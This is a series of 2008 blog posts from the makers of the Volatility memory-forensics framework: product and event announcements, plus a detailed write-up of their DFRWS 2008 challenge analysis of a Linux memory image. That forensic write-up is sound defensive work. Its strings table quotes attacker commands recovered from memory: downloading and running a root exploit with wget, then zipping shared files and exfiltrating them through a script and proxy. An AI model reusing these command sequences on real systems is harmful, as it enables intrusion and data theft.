Thursday, October 16, 2008

Voltage: Giving Investigators the Power to Make a Difference!

Do you feel like your current methods of performing digital investigations are antiquated and unable to deal with the threats posed by the modern digital adversary? Do you feel that forensic vendors have lost touch with the needs of investigators? Do you believe that the ability to perform investigations is not a privilege for those who can afford an $100,000 price tag? Are you tired of forensics vendors who seem more interested in exploiting the community rather than helping to empower investigators? We are in the midst of a "Digital Forensics Revolution"!



During our presentation at the SANS Forensics Summit, "Upping the 'Anti': Using Memory Analysis to Fight Malware", we made two major announcements which will dramatically affect the way digital investigations are performed across the enterprise. The first announcement related to the availability of a powerful new feature in F-Response 2.03, remote real-time read-only access to a computer system's physical memory. By coupling this revolutionary technology with their ability to provide remote access to a computer's physical disks, F-Response has provided digital investigators a truly unique capability that will shape the future of digital investigations.


During the presentation, we also publicly unveiled Voltage. Voltage is a platform that combines the award winning memory analysis capabilities of Volatility with the remote real-time access provided by F-Response. Imagine being able to reach across the network into the physical memory of a remote system and extract a sample of a suspicious executable in real time! While some investigators will prefer the command-line interface and cost effectiveness of Volatility (free!), Voltage provides an option for enterprise investigators who desire advanced automation and visualization. It also provides investigators with the ability to continuously monitor and verify the runtime state (integrity) of the systems within their organization. If an incident is detected, Voltage is able to automatically capture a sample of physical memory while the artifacts are still resident in memory and temporally relevant. It also provides the ability to search for Advanced Persistent Threats (APT) that may be hiding within the enterprise. Voltage gives investigators unprecedented visibility into the once opaque components of the information infrastructure.

It's important to emphasize that Voltage provides a capability unlike anything you have ever seen. Unlike other enterprise solutions, which deploy heavyweight agents or servlets that attempt to naively perform live analysis on a compromised machine, the minimal F-Response target merely provides access to the raw data. At the same time, all of the complex processing and analysis is done remotely on a trusted machine. As a result, you have complete access to the runtime state of the remote system, physical memory and pagefile (swap), while minimizing your impact on potential artifacts and reducing your exposure to subversion. Whereas other solutions force you to collect a snapshot of physical memory, sometimes taking hours before analysis can even begin, Voltage allows the investigator to begin analyzing physical memory on a remote system in real time.

Thursday, October 9, 2008

Hoffmann Advanced Forensic Sessions

I'm very excited to announce a new training opportunity for those in Europe or those who like to travel to Europe. My colleagues at Hoffmann Investigations will be hosting advanced forensics training for experienced investigators. As a part of this unique week long training, I will be leading a 2-day session on Memory and Malware Forensics. This session is designed to combine informative lectures with hands-on training exercises and realistic scenarios, similar to those that our investigators have faced in the field. This is your opportunity to learn how to leverage the power of Volatility 1.3 to improve your digital investigation process.

Training agenda:

  • Session 1 - Advanced Vista forensics: Lance Mueller

  • Session 2 - Apple and iPhone forensics: Remon Verkerk

  • Session 3 - Open source forensics, File Formats and Advanced File Carving: Joachim Metz and Robert-Jan Mora

  • Session 4 - Advanced Memory Forensics and Malware Analysis: AAron Walters

Please be sure and register early. It is limited to 25 participants and I'm sure it will fill up quickly. For more details and information on how to register, please visit Hoffmann Investigations.

Sunday, September 7, 2008

Volatile University: Memory Forensics in the Classroom

Memory forensics is a critical component of the digital investigation process and an important skill for digital investigators. At Volatile Systems, we are committed to helping educate the community about memory analysis. In support of this commitment, we are currently working with a number of university, college, and continuing education programs to help integrate volatile memory analysis into their digital forensics course work and lab exercises. This is an exciting opportunity for us to work with future digital investigators and those investigators who have gone back to improve their skill set. If you are currently instructing a class on computer forensics and have an interest in exploring how other educators are integrating memory forensics into their curriculum, please let us know.

On a related note, this fall I will be co-teaching a graduate class, ENTS 689I Network Immunity, at the University of Maryland, College Park. This course will actually be composed of three short courses: Cryptography and Information Security, System Security, and Network Security. I am very excited to be teaching this class alongside Dr. Charles Clancy and Dr. Nick Petroni. I consider Charles and Nick to be two of the top systems security researchers. Charles has done some amazing work in the area of wireless networking and Nick pioneered much of the work being done in memory analysis and rootkit detection. Based on the topics which will be covered and the projects that are going to be assigned, this should be a very exciting class! Not to mention, the students will also have the opportunity to learn about memory forensics using Volatility!

Saturday, August 16, 2008

Open Memory Forensics Workshop (OMFW)

I want to take this opportunity and thank everybody who attended the first Open Memory Forensics Workshop (OMFW). In particular, I want to thank all those who volunteered their time and resources to make the workshop such a success, especially, Eoghan Casey, Brendan Dolan-Gavitt, Andreas Schuster, Dr. Michael Cohen, Jesse Kornblum, Dr. Brian Carrier, Matthew Geiger, Keith Jones, and Brian Dykstra. I have received nothing but positive feedback [link][link][link] which is directly attributable to the efforts of those who contributed.

As with many of you who follow my blogs, I firmly believe that volatile memory analysis can dramatically augment the way we currently perform digital investigations and has the ability to help address many of the open challenges that we currently face. I also know that the progress we have seen in memory forensics over the last few years has been driven by the work done in the open source community. The reason Volatile Systems sponsored this workshop is because our organization is committed to the belief that forensics and security should be accessible to everyone. The goal of this workshop is to create a forum that brings together the top researchers and practitioners in an environment that fosters the open exchange of ideas, so we can find ways to help each other. It is our goal to help make this community approachable, so others may be inspired to get involved and contribute back to the community.

If you are interested in learning more about this years workshop, the agenda and and slides have have been posted on the OMFW website. As a side note, we have already started the planning for next year's event. Be sure to follow this blog and the workshop website for further updates! Due to the overwhelming response this year, we were not able to fulfill all the registration requests, so please be sure to register early!

Please feel free to post any comments, questions, or feedback you may have!

Friday, August 15, 2008

Volatility 1.3: Advanced Memory Forensics

The Volatility Team is pleased to announce the release of Volatility 1.3, the open source memory forensics framework. The framework was recently used to help win both the DFRWS 2008 Forensics Challenge and the Forensics Rodeo, demonstrating its power and effectiveness for augmenting digital investigations.

The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for performing advanced memory forensics. The extraction techniques are performed completely independent of the system being investigated but still offer unprecedented visibility into the run time state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples, while providing a powerful platform for further research.

Volatility 1.3 currently supports the investigation of Microsoft Windows XP Service Pack 2 and Service Pack 3 memory samples. Preliminary support has also been added for the Linux operating system, making Volatility the only cross platform memory analysis framework.

Some of the new features in Volatility 1.3 include:

  • Over 14 new data view modules!

  • New object model allowing easier module development and memory exploration

  • New plugin design allowing organizations to easily create, maintain, and share modules

  • New object oriented scanning infrastructure (Very Fast!)

  • Process graphing capabilities

  • Ability to extract open registry handles

  • Ability to dump a process' addressable memory

  • Ability to extract executables from memory samples

  • Transparently supports a variety of sample formats (ie, CrashDump, Hibernate, DD)

  • Automated conversion between sample formats

  • New scanning modules (ie, modules)

  • Support for XP SP3


Special thanks to Brendan Dolan-Gavitt, Andreas Schuster, Michael Cohen, and Matthieu Suiche.

Download the Volatility Framework from:

https://www.volatilesystems.com/default/volatility

Thanks,

The Volatility Team

Wednesday, August 13, 2008

PyFlag/Volatility Team Wins DFRWS Challenge!



I'm very excited to announce that the PyFlag/Volatility Team was chosen the winner of the 2008 Digital Forensic Research Workshop (DFRWS) Forensic Challenge. This year's challenge focused on developing advanced tools and techniques in the areas of memory forensics and data fusion.

I want to take this opportunity to thank Eoghan Casey, Matthew Geiger, and Wietse Venema for putting on a fantastic challenge. I also want to thank both Michael Cohen and David Collett for all their hard work and long hours. It was an honor to work with such a strong team. It's amazing to see how the PyFlag and Volatility teams have combined forces to dramatically push the state of the art in digital forensics research and analysis!

In case you missed it in previous posts, the final submission can be found here.

Tuesday, July 29, 2008

SANS WhatWorks Summit in Forensics and Incident Response

If you have time in October, you may want to attend the SANS WhatWorks Summit in Forensics and Incident Response. I'm scheduled to give an invited talk titled "Upping the 'Anti': Using Memory Analysis to Fight Malware". It is Vegas after all...

Digital Investigation Journal

I'm pleased to announce that I recently accepted an appointment to the Editorial Board of Digital Investigation: The International Journal of Digital Forensics & Incident Response. I consider the Digital Investigation one of the top venues for publishing research in the area of memory forensics and I hope to help that trend continue. In fact, our initial paper "FATKit: A framework for the extraction and analysis of digital forensic data from volatile system memory" was originally published in Digital Investigation. I encourage people doing research in the area of memory analysis to submit their research for publication in Digital Investigation. You can be guaranteed to get one of my lengthy reviews!

Tuesday, July 15, 2008

Linux Memory Forensics

A collaboration with the PyFlag team, Michael Cohen and David Collett.

One of the major components of the DFRWS 2008 challenge was to improve the state of Linux memory forensics techniques and to develop tools that are applicable to a broad range of systems and forensic challenges that an investigator may face. In this section, we will discuss the efforts that we have made in order to address those objectives. Our goal was to make a variety of new tools and techniques available to investigators and demonstrate how they can be used to help investigate the memory sample provided as part of the challenge (challenge.mem). At the end of this section, we will also address how the information extracted from RAM can be leveraged in the second major component of the challenge, the fusion of memory, hard disk, and network data.

Previous research has demonstrated that memory forensics is often an important component of the digital investigation process [cite]. Memory forensics offers the investigator the ability to access the runtime state of the system and has a number of advantages over traditional live response techniques, typically used by forensic toolkits [cite]. While there has been some previous research into Linux memory forensics, the majority of the recent work has focused primarily on Windows memory analysis.

In 2004, Michael Ford demonstrated how an investigator could use many of the preexisting tools used for crash dump collection and analysis to help perform analysis in the wake of an incident[cite]. In particular, he described how the the "crash" utility can be used to investigate a crash dump collected from a compromised system. While "crash" proved a valuable tool for analyzing crash dumps, the author is forced to rely on "crude" techniques for analyzing memory samples that were not collected in a crash supported format (ie linear mapping of physical memory). Also in 2004, Mariusz Burdach describes collecting a sample of physical memory through from the /proc pseudo-filesystem and it's kcore file[cite]. He began by performing basic analysis (grep, strings and hex editors) to look for interesting strings and he then discussed advanced analysis that could be performed by painstakingly using gdb to analyze the system call table and list running processes. In 2005, Sam Stover and Matt Dickerson used a string searching method to find malware strings in the memory sample collected from /proc/kcore on a Linux system [cite]. Later in 2005, Burdach extended this research by releasing the idetect tools for the 2.4 kernel, which aided in extracting file content from memory and listing user processes[cite]. In 2006, the FATKit project described generic architecture to effectively deal with memory forensics abstractions allowing support for both Linux and Windows analysis, as demonstrated in the example modules[cite]. In 2006, Urrea also described techniques for enumerating processes and manually rebuilding a file from memory[cite].

As we can see in each of these previous examples, debugging tools and their supporting information (ie Symbols) have played an important part of Linux memory forensics. As a result, we felt it was important to leverage as much of the previous work and experience with Linux kernel debugging as possible. Thus our first contribution with respect to this challenge was to create a patch for the Red Hat crash utility, which is maintained by David Anderson. This is the same utility that was originally discussed by Ford, but now we have modified it so that it can analyze a linear sampling of physical memory, as in the case of the challenge.mem sample distributed with the challenge.

Red Hat Crash Utility

The Red Hat Crash Utility combines the kernel awareness of the UNIX crash utility with the source code debugging abilities of gdb. It is also has the ablility to analyze over 14 different memory sample formats. Another advantage of crash is that it has support for a number of different architectures (x86, x86_64, ia64, ppc64, s390 and s390x) and versions of Linux (Red Hat 6.0 (Linux version 2.2.5-15), up to Red Hat Enterprise Linux 5 (Linux version 2.6.18+)). Thus it really does address the need to have a broad applicability. Our patch for crash can be found at the following following url:

http://www.4tphi.net/~awalters/dfrws2008/volcrash-4.0-6.3_patch

Once the patch has been applied (patch -p1 <volcrash-4.0-6.3_patch) and the source code built (make), you will also want to obtain the mapfile and namelist (a vmlinux kernel object file) for the DFRWS memory sample.

In order to process a linear sampling of memory, you will need to pass the --volatile command line option as seen in the following example:

./crash -f ../2.6.18-8.1.15.el5/System.map-2.6.18-8.1.15.el5 ../2.6.18-8.1.15.el5/vmlinux ../dfrws/response_data/challenge.mem --volatile

Crashing Challenge.mem

In this section, we will discuss how we can use the crash commands to help extract artifacts from the memory sample found in the challenge. Upon successful invocation, crash will present information about the system whose memory was sampled. For the image in the challege, the output will look like this.

From this information, we can see that the sample was taken on Sun Dec 16 23:33:42 2007 and the machine had been running for 00:56:51. It also gives us a lot other interesting information from the image such as the amount of memory, the number of processors, etc. Our patch sets the current context to the Linux task with the PID of 0. As seen, in the output this is the PID for the "swapper" task. If necessary, this context can be changed using the "set" command. Information about available commands can be found through the "help" command. In the following sections we will demonstrate the type of information that can be extracted using crash. In particular, we will primarily focus on those things germane to the challenge.

Processes

Listing tasks is often one of the first things people want to do to see what is actually running on the system. By issuing this command, the investigator will receive information about process status similar to the Linux ps command:

crash> ps
output

From this output we can extract information about the processes that were active on the box when the sample was collected. The ps command also has a number of useful command line options. For example, the investigator may want display a processes parental hierarchy to determine how it was invoked (-p). As seen in the following output, the -t option can also be used to display the run times, start times, cumulative user and system times for the tasks. This information can be extremely useful as part of time line analysis and for determining the temporal relationships between events that occurred on the system.

crash> ps -t
output

Using the -a option we are able to discern the command line arguments and environment strings for each of the user-mode tasks. This maybe particularly useful when encountering an unknown process in memory or determining how an suspicious executable was invoked. This can also be helpful for mapping a process and it's associated UID back to the user when the /etc/passwd file is not available. For example, by leveraging the environment strings we can determine that the bash process (PID: 2585) was started by user stevev.

crash> ps -a
output

We are also able to extract the open files associated with the context of each task. Beyond presenting information associated with each of the open descriptors, it also prints current root directory and the working directory for each of those contexts. This can often provide valuable leads when dealing with the large volume of evidence associated with modern investigations.

crash> foreach files
output

We can also extract information about each tasks open sockets. This can be useful to determine if there are any open connections with other systems that need to be investigated further. It will also show if the systems is listening on any ports which may have been points of entry or backdoors left behind. We can see that in the case of the challenge memory sample there aren't any open connections but the dhclient process (PID: 1565) has a socket with source port 68 and sendmail process (PID: 1872) has a socket with source port 25.

crash> foreach net
output

Using crash we can also extract a lot of other information related to the state of the system:

Mounted file systems
crash> mount
output
Open files per file system
crash> mount -f
output
Kernel message buffer
crash> log
output
Swap information
crash> swap
output
Machine information
crash> mach
output
Loaded Kernel Modules
crash> mod
output
chrdevs and blkdevs arrays
crash> dev
output
PCI device data
crash> dev -p
output
I/O port/memory usage
crash> dev -i
output
Kernel memory usage
crash> kmem -i
output
Kernel vm_stat table
crash> kmem -V
output

There are a couple of things to note from the previous output information. First from the swap information we can see that the load on the system is not causing pages to be swapped out. Second by leveraging the data in the kernel message buffer we can get an indication of when the system was booted. For example, by looking at the audit(1197861235.541:1): initialized boot message which has a unix timestamp of 2007-12-16 22:14:01.

This was just a sample of the type of information that is available through the default command set that comes with crash. Another benefit associated with leveraging the Red Hat Crash Utility is that the command set can be extended through loading shared libraries. In the following section, we will discuss an extension module that will allow us to use Python scripts to interface with crash.

PyKdump Framework (Python scripting for crash)

PyKdump, written by Alexandre Sidorenko, embeds a Python interpreter as a dynamically loadable 'crash' extension so you can create Python scripts to help perform analysis. In the following sections, we will show how PyKdump can help extract information from the challenge memory sample.

PyKdump includes a program called xportshow which can be used to extract a lot of useful network related information beyond what is available in the crash default command set. PyKdump and the xportshow program can also be used to extract important information from the challenge sample.

One of the first things we can do is extract detailed information about system's available interfaces. This allows us to extract information similar to that provided by the Linux command "ifconfig". This is useful for extracting the state of those interfaces including the times since they may have transmitted or received packets and whether the interface is in promiscuous mode or not. From this we can also confirm that the IP address of the eth0 interface is 192.168.151.130 which can help as we analyze the pcap data.

crash> xportshow -iv
output

Using xportshow, we can also extract information from the internal ARP cache. This can be useful to determine other systems that may need to be investigated or to determine if the ARP cache has been manipulated in any way.

crash> xportshow --arp
output

We can also extract the internal routing table to determine if the routes have been manipulated in an attempt to redirect traffic.

crash> xportshow -r
output

While on the topic of layer 3 routing, we can also use xportshow to extract the route cache also known as the forwarding information base (FIB) on Linux. This stores recently used routing entries and is consulted before going to the routing table. Thus we can use this information to determine other machines the system was communicating with and look for signs manipulation. For example the route cache for the challenge image shows that our suspected system (192.168.151.130) previous communicated with the following addresses: 219.93.175.67, 86.64.162.35, 192.168.151.2,192.168.151.254. The 219.93.175.67 address corresponds to the address where the zip files was being exfiltrated.

crash> xportshow --rtcache
output

Now continuing to move up the stack we can also use xportshow to once again extract all the open sockets. As seen in the following results, xportshow presents this information in a format similar to netstat. This is extremely useful for determining both active network connections or listening services. It also provides a number of command line arguments for filtering the output.

crash> xportshow -a
output

PyKdump also has provides a crashinfo program that can print the systems runtime parameters (sysctl), file locks, and stack summaries.

As you can see, our patch now allows us to leverage both the Red Hat Crash Utility and PyKdump to extract a lot of valuable information from the memory sample in the challenge. The goal of our further development efforts were to leverage the power of these tools while developing new tools and techniques that are applicable to an even broader range of systems and forensic challenges than just the debugging Linux systems. The following sections will describe how we addressed those goals using Volatility, the open source volatile memory artifact extraction utility framework. We will also discuss how we are adding support to Volatility that will allow you to run your PyKdump commands transparently, even while working on a Windows host. By leveraging Volatility, our efforts for combining multiple data sources will not be limited to a particular operating system.

Volatility

Volatility is an open source modular framework written in Python for extracting digital artifacts from acquired samples of volatile system memory. From it's inception it was designed to be a modular and extensible framework for analyzing samples of volatile memory taken from a variety of operating systems and hardware platforms. The Volatility Framework builds upon research we performed on both VolaTools and FATKit. While previous versions of the framework focused on the analysis of Windows XP SP2 samples, as a part of this challenge we will demonstrate how it can be easily adapted to other operating systems as well (i.e. Linux). This challenge also allowed us to make use of the powerful new features which were added to Volatility 1.3.

The power of Volatility is derived from how it handles the abstractions of volatile memory analysis within it's software architecture. This architecture is divided into three major component: Address Spaces, Objects and Profiles, and Data View Modules.

Address Spaces

Address spaces are intended to simulate random access to a linear set of data. Thus each address space must provide both a read function and a function to test whether a requested region is accessible. It is through the use of address spaces that Volatility is able to provide support for a variety of file formats and processor architectures. These address spaces are also designed to be stackable while maintaining the ability to have concurrent handles to the same data through different transformations. In order to analyze the challenge.mem sample, we make use of both the FileAddressSpace and the IA-32 paged virtual address space, IA32PagedMemory, that are also used for Windows memory analysis.

Objects and Profiles

Objects refer to any data that is found within an address space at a particular offset. The new object model included in 1.3, which was used in the software for this challenge, supports many of the semantics of the C programming language. Volatility uses profiles to define those object formats. When analyzing an Linux sample, the profile can be automatically generated from the source code or debugging information. For the challenge we will be using a profile generated for the 2.6.18-8.1.15.el5 kernel. We also include the System.map as a component of the profile as well.

Data View Modules

Data view modules provide algorithms to find where the data is located. These are the methods used to collect data or objects from the sample. For this challenge we created 11 new data view modules to facilitate analysis of Linux samples. The following sections will describe each of the new modules that was created. These new modules were also built for the new pluggable architecture included in Volatility 1.3. This allows new modules to be added without requiring any changes to source code.

Strings

As we mentioned previously, one of the most common forms of analysis performed on a sample of physical memory is to look for sequences of printable characters extracted using the "strings" command. Thus it is here that we will begin our discussion of analyzing memory using Volatility. One of the major limitations with relying on this method of analysis alone is that it is a context free search. Thus it simply treats the sample of memory as a big block of data. For example, while reviewing the strings from this image we are able to find strings related to bash command history resident in memory. From these commands we can see that someone on the system attempted to copy Excel spreadsheets and Pcap files from an admin share (/mnt/hgfs/Admin_share) to a temp file. At some other point they attempted to discover if a vulnerable version of the X windows system was running on the system. They then proceeded to download and execute a privelege escalation exploit from the metasploit project intended to gain root privileges.

In an attempt to add more context to these types of strings we created a module called linstrings which provided the equivalent functionality to Volatility's string command. This allows us to map the strings extracted from the memory sample back to the corresponding virtual address and associated process. This mapping is accomplished by walking the address translation tables and determining which processes has the ability to access the physical page where the string is located. In the Linux version we only consider the user land address space.

python volatility linstrings -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5 System.map-2.6.18-8.1.15.el5 -S challenge.strings > dfrws_strings_map
output

Examples of interesting strings
Physical Offset
[Pid:Virtual Address]
String
8393760 [2582:8fa1420 ] http://219.93.175.67:80
10456534
[2585:8b59dd6 ] tar -zpxvf xmodulepath.tgz
197604536 [2585:8b4e4b8 ] wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
107837393 [2582:92087d1 ] [stevev@goldfinger ~]$ cp /mnt/hgfs/software/xfer.pl .
207989168 [2585:8b4b9b0 ] ./xfer.pl archive.zip
212984368
[2585:8b4c230 ] zip archive.zip /mnt/hgfs/Admin_share/acct_prem.xls /mnt/hgfs/Admin_share/domain.xls /mnt/hgfs/Admin_share/ftp.pcap
222017064 [2582:922f628 ] [stevev@goldfinger ~]$ rm xfer.pl
10456593 [2585:8b59e11 ] ./root.sh
197607328 [2585:8b4efa0 ] export http_proxy="http://219.93.175.67:80"

The ability to map these strings back to their respective processes is extremely useful. We can can see that all the strings in the previous table were addressable by processes with a UID of 501, which is the UID for user stevev, Steve Vogon.

Examples of interesting files found in memory

/etc/passwd
link
/etc/group
link


linident/lindatetime

The linident module is used to provide valuable information about the system the memory sample was acquired from. This module provides similar information to the crash sys command but it has been augmented to include timezone information, which we have found useful during temporal reconstruction. As seen the the following output the local timezone for the system was GMT-5. It also provides the GMTDATE corresponding to when the sample was acquired. The current time and timezone information can also be obtained from the lindatetime module as well.

$python volatility linident -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5.map
output

linps

We also provide a module that will extract what processes were running on the system when the sample was acquired. We have augmented this to also include the UID of the process owner. By combining this with the strings to process mapping provided by linstrings we are able to attribute those strings to a particular user. For example by correlating with the environment information previously discussed ( or if /etc/passwd was available) we know any process with UID 501 can be attributed to user stevev. We also know that any strings mapping to those process are related to that user as well.

python volatility linps -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5
output

linpsscan

We have also included linpsscan which makes use of the Volatility scanning framework. Unlike linps which traverses the operating system data structures to find the processes that were running on the system, this modules performs a linear scan of the physical memory sample while searching for task_struct objects which it treats as a constrained data item. These contraints were automatically developed by sampling valid task_structs from the memory sample. The benefits associated with this technique can be seen in the fact that the previous module, linps, was only able to enumerate 89, while linpsscan found 10 more with the physical address space. We have also included the UID so each task_struct could be mapped back to a user.

python volatility linpsscan -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5
output

linmemdmp

We also created a module called linmemdmp. This module automatically rebuilds the address space for a specified process and dumps its entire addressable memory to a file for further analysis. This can be extremely useful if you are attempting a brute force encryption keys (ie SSL) or you want to add some context to your string searches. The process to be dumped can be specified by either a PID (-P) or task_struct physical memory offset (-o) depending on whether it was discovered with linps, or linpsscan, respectively..

python volatility linmemdmp -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5 -P 3048

linpktscan

We also created a linpktscan module that performs a linear scan of the sample of physical memory looking for memory resident network packets. This module makes use of the Volatility generic scanning framework to describe network packets as constrained data items. The current implementation constrains the sought after data to either UDP or TCP packets with a header of minimum length that has a valid IP header checksum. Another nice feature of this module is that it also allows the investigator to extract those packets from memory and write them to a pcap file that can then be imported into their favorite packet analysis tool (ie Wireshark).

python volatility linpktscan -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5
output

Using this module on the memory sample provided in the challenge, we were able to see that the system had recently communicated with the following IP addresses over http: 219.93.175.67, 198.105.193.114. Of particular interest are the packets being sent to the 219.93.175.67 address. This was the address where the zip file was exfiltrated using http cookies. By using linpktscan we are able to find and extract memory resident packets with cookies containing parts of the exfiltrated data. Thus we are able to connect the data in the pcap files back to the system.

On another interesting note, we are also able to extract FTP packets flowing between 10.2.0.2 and 10.2.0.1. These memory resident packets were part of the ftp.pcap file that was exfiltrated. Thus we know that at some point this file was loaded into memory on the system.

linvm

This module will display the virtual memory mappings for each process. This provides information analogous to that typically found by the maps file in the /proc entry for the process. This can be extremely useful for determining which files maybe memory mapped by a process and where they can be found within memory. This can be extremely helpful for determining how the address space is being used. We have also augmented the output to include information about the code, data, and stack regions of a processes virtual address space in case an investigator wants to extract them from memory as well.

python volatility linvm -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5
output

linsockets

We have also included a module linsockets which can be used to extract information about each task's open sockets. As previously mentioned this can be useful for determining if there are any open connections with other systems or if the system is listening on any unexpected ports and if so which process is responsible.

python volatility linsockets -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5
output

linfiles

We are also able to extract the open files associated with the context of each task. As previously mentioned, this can often provide valuable leads to target files or directories of interest when dealing with large disk images.

python volatility linfiles -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5
output

linmodules

The final module which we have included is linmodules. This will print basic information about the currently loaded kernel modules. This allows an investigator to determine if anyone may have attempted to load a kernel module to dynamically change the behavior of the kernel.

python volatility linmodules -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5
output

As you can see, Volatility provides a powerful software architecture that allows it to be easily adapted to whatever type of hardware or operating system the investigator needs to analyze. It also provides extremely useful APIs and libraries that allow investigators quickly create new modules to support their investigations and to easily share those modules with colleagues. We are also finishing up code that will allow you to run PyKdump scripts transparently within both crash or Volatility. Another advantage of Volatility is that it allows allows the analyst perform their investigations on any operating system which supports Python. Thus we believe that Volatility allows us to achieve our goals of leveraging previous work in kernel debugging while being applicable to a broad range of systems. Finally, Volatility is currently integrated into a number of analysis frameworks including both PTK and PyFlag.

PyFlag Memory Analysis

PyFlag has officially supported memory forensics since it's integration of Volatility in January of 2008. Thus allowing an investigator to correlate disk images, log files, network traffic, and memory samples all within an intuitive interface. It was also the first framework to support analysis of memory samples stored in either EWF or AFF formats. In this section, we will discuss how with the upcoming release of Volatility 1.3 this integration has been extend so that PyFlag now has the ability to support the analysis of both Linux and Windows memory samples. This functionality will be briefly discussed on the memory sample included in the challenge.

In order to analyze a memory sample with PyFlag, the sample must be loaded. This is accomplished by choosing the Load IO Data Source menu item found under the Load Data Tab at the top of the screen. At the Load IO Data Source page set the "Select IO Subsystem" to standard and leave the "Evidence Timezone" to SYSTEM. At the next "Load IO Data Source" page once again set the "Select IO Subsystem" to Standard and leave the "Evidence Timezone" to SYSTEM. Depending on whether your image can be found on disk or the Virtual File System, click either the finger pointing to the folder or the VFS files, respectively. Having already loaded the evidence file, we will search for the memory sample within the VFS. Thus we click on the VFS folder. At this point we will be presented with a table listing all the files in the VFS. In order to find the file we are looking for, challenge.mem, we click the funnel in the upper left hand corner of the window which will allow us to filter the table. At the Filter Table pop-up screen type, ("Filename" contains challenge) into the Search Query dialog box. Then, click the submit button at the bottom. At this point you should see the challenge sample in the table. After choosing the sample you will be returned to the Load IO Data Source page. Fill in the "Enter partition offset:" box with a zero and the "Unique Data Load ID" box with "mem".
Now click the Submit button in the lower left had corner of the windows. You will now be brought to the "Load Filesystem image" screen. Verify that the "Case" value is set to dfrws and the "Select IO Data Source" matches the value you entered for "Unique Data Load ID" on the previous screen. Then set the "Enter Filesystem type" drop down to "Linux Memory" and choose a mount point (ie memmnt) for the "VFS Mount Point" entry box.
Next click the Submit button at the lower left hand of the screen. At this point you will be prompted to choose a Volatility profile. Select the 2_6_18-8_1_15_el5 "Profile" from the drop down menu and click the Submit button again. Next you will be presented with another drop down menu to select a "Symbol Map". Select System.map-2.6.18-8.1.15.el5.map from the drop downs.
Once the System Map is selected, select the Submit button on the lower left had corner again. At this point it will begin to load the sample into the system. When it is finished loading you will return to the "Browsing Virtual Filesystem" windows and your sample will be mounted at the specified "VFS Mount Point", which in our example is memmnt. Now that our memory sample has been loaded you can access the data through a browseable /proc interface or through the "Memory Forensics" menu item at the top of the screen.
On the other hand, you can also access the data through the "Memory Forensics" menu item at the top of the page as seen in the following image.

By clicking on a linked address it will automatically perform the address translation and take you to the correct offset within the physical address space. As we previously mentioned we can also run PyFlags award winning collection of carvers against the loaded sample.

Friday, July 4, 2008

Independence Day: The Emancipation of Volatile

Today is truly a day to celebrate independence! As of today, Volatile Systems LLC is now free of any contractual agreements which had the ability to limit our business opportunities and technology advancement. Our year long sabbatical has officially ended. As a result, this will allow us to fully integrate the research we have done over the past five years in the areas of memory forensics and rootkit detection (i.e. FATKit: Memory Forensics, Malware Analysis: DLL Injection Detection, Semantic Integrity, Enterprise Rootkit Detection. This includes all technology which we may have previously licensed to third parties. While others were creating and selling the rootkits responsible for millions of dollars in damages to government and commercial organizations, our team was focused on performing the research necessary to address these threats using memory analysis. Get ready for the real next generation of memory forensics and always remember that "Integrity Matters"!

Sunday, June 15, 2008

Memory Forensics Tool Testing

Volatile Systems LLC is pleased to announce the Memory Forensics Tool Testing initiative. With the growing number of memory acquisition tools that have recently been made available, Volatile Systems has begun establishing a team of industry experts to objectively evaluate these tools. As with other computer forensic tool testing efforts (CFTT), the goal of this project is to develop an open methodology and metrics for testing memory acquisition tools. The hope is to help drive memory forensics tools to improve and help users make informed decisions.

Over the last five years, the Volatile Systems team has built numerous hardware and software acquisition methods and, as a result, has the unique combination of institutional knowledge and technical capabilities necessary to effectively lead this effort. We have also chosen a respected team of industry experts to help ensure the validity and objectivity of our testing methodology. As the leading provider of memory forensic analysis services, we are committed to helping our customers and the community at large find the best solutions to suit their memory acquisition needs. If you would like to take part in this project or feel you have insight that could be valuable, please feel free to contact us. We also extend this invitation to vendors who want to make sure that we are evaluating their latest offerings. The MFTT initiative will be a major topic on the OMFW agenda!

Friday, May 30, 2008

Open Memory Forensics Workshop (OMFW)

Volatile memory forensics (ie., RAM forensics) is becoming an extremely important topic to the future of digital investigations. It has the potential to dramatically transform the way we currently perform digital investigations and help address many of the challenges currently facing the digital forensics community.

We are pleased to announce the first ever workshop focused on open source volatile memory analysis. This workshop will bring together digital investigation researchers and practitioners to discuss the latest advancements in volatile memory analysis. You will also learn how memory analysis is currently being used to augment digital investigations. Through a series of invited talks and panel discussions you will have the opportunity to engage this exciting community.

This half-day workshop will be co-located with Digital Forensics Research Workshop (DFRWS) 2008 in Baltimore, Maryland, USA, on August 10, 2008. Pre-registration is required and space is limited, so register early. Please note that it will not be possible to register at the door. Reserve your seat by contacting: AAron Walters (awalters [at] 4tphi [dot] net). We are also still seeking individuals with interesting insights who would like to participate as a speaker or panelist.

